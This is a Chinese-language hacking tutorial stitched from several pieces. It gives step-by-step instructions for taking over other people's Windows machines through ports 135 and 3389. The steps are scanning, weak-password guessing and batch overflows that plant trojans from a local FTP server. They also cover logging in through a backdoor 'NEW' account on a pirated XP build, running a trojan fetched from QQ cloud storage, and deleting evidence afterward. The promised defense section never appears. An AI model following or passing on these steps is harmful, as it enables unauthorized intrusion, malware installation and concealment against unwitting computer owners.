//运行python文件注：在一般情况下需要在工具根目录下创建listeningposts文件夹，否则运行文件时，会报错。接下来依次填入对应信息： 172.16.12.3//目标IP 172.16.11.2//本地IP no //取消重定向 c:\logs //指定日志文件目录

关于135端口实战入侵&安全防御

无论是高手还是菜鸟，大家都知道常见的高危端口：135，139，3389，445等。大家唯恐不能快点关闭这些端口以及相应的服务来保证系统的安全。其实本人认为这是错误的，黑客技术是建立在攻与防之间的，下面看本人的135实战原理分析，以及135端口的安全防御！一，工具攻防现在在网上，有很多的135抓鸡器，都是全自动的，利用135端口往往能抓很多肉鸡，为什么呢？因为正版系统为了性能都是开启这些高危服务的，而用户是新手或者安全意识不强的话，就不会关闭这些东西，他们也不懂这些，所以就被抓了。我们从工具的抓鸡过程来分析！图一这是一款典型的135抓鸡器，下面我们来分析一下抓鸡的过程，从攻击的方面来防御！首先扫描，筛选开启135端口的机器，这些都是很普通的。下面开始扫描弱口令了，从反面的角度来说，135端口入侵需要弱口令（弱口令就是保护强度很弱的密码，比如123）。接着看溢出，溢出是利用下载马的形式。实战： 1，扫描135端口，然后筛选出弱口令等。 2，启动ftp或者是tftp本地服务器，开启服务，将木马设置放进目录 3，按照步骤批量溢出，在此填入你的电脑，以及改变相应的设置

图二防御在下面的文章说。二手动入侵手动入侵是最爽的了，用工具不如手工的灵活。这样我们就要详细分析下135端口了！我们打开管理，查看服务。图三众所周知，135端口的服务是RPC。看RPC的说明，似乎毫无头绪，是的根本看不明白。下面就说下使用的方法。在这里，入侵的常见步骤是： 1，确定目标 2，扫描端口，假设开启了135端口

3，开启需要的漏洞服务，比如IPC共享或者telnet 我们开始实战！通过上面的描述，作为终结点映射程序和com服务控制管理器使用。意思就是远程控制电脑的服务。那这样，我们就连接到远程电脑的服务控制台。打开服务管理器，在上面点击操作，点击连接到另一台电脑。图四图五图六

远程电脑3389端口入侵+工具

前些日子，我们这还可以用135抓肉鸡，现在不能用了。本来想发个贴子的，因为抓不了图，所以只好试试3389了。现在才发现，其实3389是个非常适合菜鸟抓肉鸡的工具。准备工具：端口扫描闪电1.0、windows自带的3389登陆器（远程桌面连接），QQ网络硬盘，木马一个。 1、用QQ申请QQ网络硬盘，将木马放入QQ网络硬盘。 2、用端口扫描闪电1.0在列表处填入3389，并选上，然后点点扫描。很快就有了。

3、用windows的远程桌面连接填入扫得的IP进行连接（3389登陆），最好是晚上12：00之后。如果是白天，那就要用用户名为NEW，密码为空登陆。

注意看图上的时间，我这是在下午16：00登陆的。然后用QQ登陆，从QQ网络硬盘上下载木马并运行。为什么在白天要用NEW的用户名登陆呢？这得从一个貌似安全，却后门多多的ghost xp2番茄花园版系统说起。这个系统只有一个IPC$共享，其它共享已删，可是

却能用啊D打开TELNET，然后用IPC$上传木马。并且它会在系统中产生一个名为NEW 的超级用户，以供3389登陆之用。所以在白天推荐用NEW用户登陆。 4、注意看，肉鸡上线了，从登陆到上线不过1分钟的时间。 5、最后要做好清理工作，进入肉鸡的QQ安装目录，找到你的QQ号文件夹将其删除。在回收站中也要删除。另外要注意，用3389不要去专牛角尖，遇到进入不了或进入后被T的先放弃，不要再去问怎么破密码或被T后怎么办。因为你破了密码后进去被T的可能性很大，被T后你再次进入还是会被T的，因为机子主人在使用。所以晚上12：00以后效率会高得多。我这里白天登陆纯属偶然，同时也说明了3389是可以利用的，希望你们的肉鸡多多，但不要干坏事就可以了，我一般只会找肉鸡上的杀毒软件来共享用用，或者找点病毒木马后门什么的，对盗QQ我是没兴趣的。